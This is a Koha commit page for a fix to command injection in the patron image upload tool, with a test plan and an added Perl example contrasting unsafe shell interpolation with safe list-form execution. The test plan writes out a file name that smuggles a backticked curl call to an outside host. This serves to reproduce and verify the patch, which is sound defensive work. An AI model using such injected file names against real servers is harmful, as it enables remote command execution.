git.koha-community.org Git - koha.git/commit
Bug 37323: Escape characters in patron image picture upload
author: Amit Gupta <amit.gupta@informaticsglobal.com>
Thu, 11 Jul 2024 17:43:06 +0000 (23:13 +0530)
committer: Tomas Cohen Arazi <tomascohen@theke.io>
Tue, 13 Aug 2024 14:05:28 +0000 (11:05 -0300)
commit: 4da9bd00e1d393619499b038ff1471f70c1a6bc3
tree: 48566b9b7c8c7d93da816b8161d010129e6ccb9f
parent: e0211501384a72481ade9d6ca74162b7d7059dd7

To Test
1. Create a file named, for example: test.zip`curl xxxxtesting.informaticsglobal.com`.zip
   where the domain is one you can watch the logs from.
2. Go to Tools and click on Upload patron images, choose the zip file option and upload the file.
3. Check /var/log/apache2/access.log and see the curl with the IP
   "xx.xxx.xx.xxx - - [11/Jul/2024:23:10:33 +0530] "GET / HTTP/1.1" 200 267 "-" "curl/7.68.0"
4. Apply the patch
5. Repeat steps 2 and 3 and check that the remote execution error no longer occurs.
6. Test that uploading an actual zip file and images still works.

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
tools/picture-upload.pl
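
The behaviour in the test plan above, reproduced as an added Perl example; it is not the code in tools/picture-upload.pl and not the change this commit makes. It assumes the upload name reaches a command line that a shell parses. `printf` stands in for the archive tool, a harmless `echo` replaces the test plan's `curl`, and all sub names are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed sample: an upload name shaped like the one in the test plan,
# with a harmless `echo` in place of the network call.
my $name = 'test.zip`echo INJECTED`.zip';

# Unsafe pattern (assumed, not taken from Koha): the name is interpolated
# into a string that /bin/sh parses, so the shell runs the text between
# the backticks before it runs the intended command.
sub via_shell_string {
    my ($file) = @_;
    return qx/printf '%s' $file/;
}

# Safer pattern: list-form open hands each argument straight to execvp.
# No shell is involved, so the whole name stays one literal argument.
sub via_argv_list {
    my ($file) = @_;
    open( my $fh, '-|', 'printf', '%s', $file )
        or die "cannot run printf: $!";
    local $/;    # slurp all output at once
    my $out = <$fh>;
    close $fh;
    return $out;
}

# Allow-list applied before the name is used anywhere: plain characters
# only, must end in .zip, and may not start with '-' or '.', which also
# keeps the name from being read as a command-line option.
sub is_safe_upload_name {
    my ($file) = @_;
    return $file =~ /\A[A-Za-z0-9][A-Za-z0-9._-]*\.zip\z/ ? 1 : 0;
}

# The shell-string form shows the substituted text inside the name; the
# list form returns the name byte for byte, backticks included.
printf "shell string : %s\n", via_shell_string($name);
printf "argv list    : %s\n", via_argv_list($name);
printf "allow-listed : %s\n", is_safe_upload_name($name) ? 'yes' : 'no';
```

When re-running steps 2 and 3 of the test plan after patching, the check is the same as in this example: the watched access log should show no request caused by the upload.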